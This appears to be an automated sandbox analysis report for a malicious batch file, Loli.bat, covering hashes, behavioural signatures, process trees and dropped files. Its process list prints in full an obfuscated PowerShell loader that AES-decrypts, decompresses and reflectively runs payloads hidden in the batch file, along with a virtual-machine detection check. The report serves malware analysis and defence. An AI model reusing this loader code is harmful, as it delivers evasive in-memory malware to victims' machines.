Analysis
-
max time kernel
94s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
28-12-2024 23:10
Static task
static1
Behavioral task
behavioral1
Sample
Loli.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Loli.bat
Resource
win10v2004-20241007-en
General
-
Target
Loli.bat
-
Size
7.3MB
-
MD5
d96987d5645d0a45dc0830e166db747e
-
SHA1
ffe0eb0aaca891bba84dd508accdbbc2df6d59f9
-
SHA256
c07250a2ea7a8523defaa97352e48b28106c21a111c81285a9ab0a34843bdc0d
-
SHA512
43d8c564977621e9368023aa3b7405b52e3d5a0d9e4c4cd4e9755be5023f59d23408cf7d50c388865d4d9215789917d5d099e66614fbb08fab38f65b94c6fa4b
-
SSDEEP
49152:DaNZgAgNBABjEgJfptzhAZ4TNiuEq9oRmcXMLEg4y07s8HuxsTZAOcHqjEItFHEH:4
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2468 powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2468 powershell.exe 2704 chrome.exe 2704 chrome.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
description pid Process Token: SeDebugPrivilege 2468 powershell.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe Token: SeShutdownPrivilege 2704 chrome.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe 2704 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2708 wrote to memory of 3056 2708 cmd.exe 31 PID 2708 wrote to memory of 3056 2708 cmd.exe 31 PID 2708 wrote to memory of 3056 2708 cmd.exe 31 PID 2708 wrote to memory of 2100 2708 cmd.exe 32 PID 2708 wrote to memory of 2100 2708 cmd.exe 32 PID 2708 wrote to memory of 2100 2708 cmd.exe 32 PID 2708 wrote to memory of 2452 2708 cmd.exe 33 PID 2708 wrote to memory of 2452 2708 cmd.exe 33 PID 2708 wrote to memory of 2452 2708 cmd.exe 33 PID 2708 wrote to memory of 2468 2708 cmd.exe 34 PID 2708 wrote to memory of 2468 2708 cmd.exe 34 PID 2708 wrote to memory of 2468 2708 cmd.exe 34 PID 2704 wrote to memory of 1976 2704 chrome.exe 37 PID 2704 wrote to memory of 1976 2704 chrome.exe 37 PID 2704 wrote to memory of 1976 2704 chrome.exe 37 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 1004 2704 chrome.exe 39 PID 2704 wrote to memory of 632 2704 chrome.exe 40 PID 2704 wrote to memory of 632 2704 chrome.exe 40 PID 2704 wrote to memory of 632 2704 chrome.exe 40 PID 2704 wrote to memory of 1452 2704 chrome.exe 41 PID 2704 wrote to memory of 1452 2704 chrome.exe 41 PID 2704 wrote to memory of 1452 2704 chrome.exe 41 PID 2704 wrote to memory of 1452 2704 chrome.exe 41 PID 2704 wrote to memory of 1452 2704 chrome.exe 41 PID 2704 wrote to memory of 1452 2704 chrome.exe 41 PID 2704 wrote to memory of 1452 2704 chrome.exe 41
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\fsutil.exefsutil fsinfo drives2⤵PID:3056
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"2⤵PID:2100
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function Hhsg($LiTn){ Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$DeVs=[heSheyshetheehemhe.heSheecheuherheihethey.heCrheyphetheohegherahephehyhe.heAheeheshe]:he:Cherheeahetehe(he);'.Replace('he', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$DeVs.MIHoIHdeIH=IH[IHSIHyIHsIHteIHmIH.IHSIHeIHcuIHriIHtyIH.IHCIHrIHypIHtIHogIHrIHaIHpIHhIHy.IHCiIHpIHheIHrMIHoIHdIHeIH]IH::IHCBIHC;'.Replace('IH', ''); Invoke-Expression -Verbose '$DeVs.Pljaljddljiljnljglj=lj[ljSyljsljtljeljmlj.Sljecljurljiljtljylj.Cljrljypljtljoljgljrljapljhylj.ljPaljddljiljnljgljMljodlje]lj:lj:PljKljCSlj7lj;'.Replace('lj', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$DeVs.KHheHhy=Hh[HhSHhyHhsHhtHhemHh.HhCHhoHhnHhveHhrtHh]:Hh:HhFHhrHhomHhBHhasHheHh6Hh4HhSHhtrHhinHhgHh("gHhbHh5jHhQHhWHhRHhKHhWHhZrHhgHhJHh9HhNHhDNHhseHhnGHhFHhNHhAHhBxHhNHhWxHhFHhsHh2HhKHhy8HhoaHhNHh0RHhp8HhMHh=");'.Replace('Hh', ''); Invoke-Expression -Debug -WarningAction Inquire '$DeVs.IUOVUO=[UOSUOyUOsUOtUOeUOm.UOCUOoUOnUOvUOerUOt]UO::UOFUOrUOoUOmBUOaUOseUO6UO4UOSUOtUOriUOngUO("VUORUOrPUOaUOhUOWUO+UOjUOBtUOXUOOUOTUORUOTxUO0eUOfbUOgUO=UO=");'.Replace('UO', ''); $wkZk=$DeVs.CreateDecryptor(); $NmOc=$wkZk.TransformFinalBlock($LiTn, 0, $LiTn.Length); $wkZk.Dispose(); $DeVs.Dispose(); $NmOc;}function DmpQ($LiTn){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire '$YiDY=Nszeszw-szOszbszjszeszcszt szSszyszssztszemsz.IszO.szMszeszmszorszyszStszrszeszaszm(,$LiTn);'.Replace('sz', ''); Invoke-Expression -Verbose '$wirR=Nszeszw-szOszbszjszeszcszt szSszyszssztszemsz.IszO.szMszeszmszorszyszStszrszeszaszm;'.Replace('sz', ''); Invoke-Expression -InformationAction Ignore -Verbose '$UvnG=NRleRlw-RlORlbRljRleRlcRlt RlSRlyRlsRltRlemRl.IRlO.RlCRloRlmRlprRleRlssRliRloRlnRl.RlGZRlipRlSRltrRleaRlmRl($YiDY, [RlIRlO.RlCRloRlmRlpRlrRlesRlsRliRloRlnRl.CRlomRlprRleRlsRlsRlioRlnRlMoRldRleRl]Rl:Rl:DRlecRloRlmpRlreRlsRls);'.Replace('Rl', ''); $UvnG.CopyTo($wirR); $UvnG.Dispose(); $YiDY.Dispose(); $wirR.Dispose(); $wirR.ToArray();}function aQPr($LiTn,$kClj){ Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$oOWF=[WWSWWysWWtWWeWWmWW.WWRWWefWWlWWeWWcWWtWWioWWn.WWAsWWsWWeWWmWWblWWyWW]:WW:WWLWWoWWaWWd([byte[]]$LiTn);'.Replace('WW', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$SUjQ=$oOWF.EClnCltrClyClPCloCliClnClt;'.Replace('Cl', ''); Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$SUjQ.SYISYnvSYoSYkSYeSY(SY$SYnuSYlSYlSY, $kClj);'.Replace('SY', '');}$ktyR = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $ktyR;$AWzc=[System.IO.File]::ReadAllText($ktyR).Split([Environment]::NewLine);foreach ($dMFJ in $AWzc) { if ($dMFJ.StartsWith('gbUIp')) { $OujB=$dMFJ.Substring(5); break; }}$JACM=[string[]]$OujB.Split('\');Invoke-Expression -Verbose -InformationAction Ignore -Debug '$xGG = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Jt', '');Invoke-Expression -Verbose -WarningAction Inquire '$bQz = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Jt', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$urF = DmpQ (Hhsg ([JtCJtonJtvJteJtrJttJt]Jt::JtFJtrJtoJtmJtBaJtseJt64JtSJttJtrJtinJtg($JACM[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Jt', '');aQPr $xGG $null;aQPr $bQz $null;aQPr $urF (,[string[]] (''));2⤵PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7139758,0x7fef7139768,0x7fef71397782⤵PID:1976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:22⤵PID:1004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1028 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:1452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2192 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:12⤵PID:1932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2200 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:12⤵PID:1200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1528 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:22⤵PID:2052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2280 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:12⤵PID:376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3668 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:2996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3708 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:12⤵PID:2836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4092 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:2908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4112 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:2744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4160 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:2092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:2872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2988 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:2900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2984 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:1404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4216 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:2108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4204 --field-trial-handle=1380,i,10803163421208178894,4822730255951230173,131072 /prefetch:82⤵PID:940
-
-
C:\Users\Admin\Downloads\onibye.exe"C:\Users\Admin\Downloads\onibye.exe"2⤵PID:1688
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1604
-
C:\Users\Admin\Downloads\onibye.exe"C:\Users\Admin\Downloads\onibye.exe"1⤵PID:2392
-
C:\Users\Admin\Downloads\onibye.exe"C:\Users\Admin\Downloads\onibye.exe"1⤵PID:2200
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
179KB
MD5906d7de8f8daa9aaf64562292eff0390
SHA1dce04e9fe547f661e744323ba8c6ac4cc093d78b
SHA256417649e97a0a04b080c8d4917733e729bbb88ccfc257943e1f3010a84196f77f
SHA51289072ba026e0d0e8fc875995b6b3dad801b9709ebbbfc941d1381fd7ff1212bd7738a375ca55d440104ec07e1996515e8eecb2c8583090008b973114e0a93138
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
5KB
MD53b616871a48b362724b8bb8a5ba61ae4
SHA18088b6b5b559377ada40a3efcfb5f3de5d8020e8
SHA256fa0f15fd82355e88003b01371225094368a5a9ad989243ef91a41bfaf4dbb580
SHA512e23ebe83c8ba29c9077f756c2020a25e73fb3edf3ea2176c7ee23fda7aace14bd44b7ddc4d281506d707e446e8d48d02c208d90b9df6765f8dd01150b24d11f4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
Filesize16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
177KB
MD5cb8c72e2efc805cf29b33c668b05bce1
SHA1381e2ac16f6683573a026af90453f3c7561f982e
SHA256ccbc15e10ca0788ff93e0652ae559f6f9194d5abbdcabce8a29c332de15276dc
SHA5124954480722cf36d218db60ee383983c12e79e9f0e0fadbab8d3c5d28f4b98c83d623e15aa132b08a2bc419c0cc3222e8485805275364854cd848f6844e2123e2
-
Filesize
327KB
MD590fcc766288dc30d3e12810feac5a373
SHA16750249adf29f74cce5c10db107766f91a2ef92d
SHA256fcc48a9c9f3227be8b8231cb103b14f8a030e9f7ff580ac6f91750eb185fced7
SHA512612103390fa99f7cae19858d943df98e87accd5eed388c401b9735e89ab0132e9304d4137ae93355eebe19e1041765334364afe9d1dc9986c45f1d89e28a680c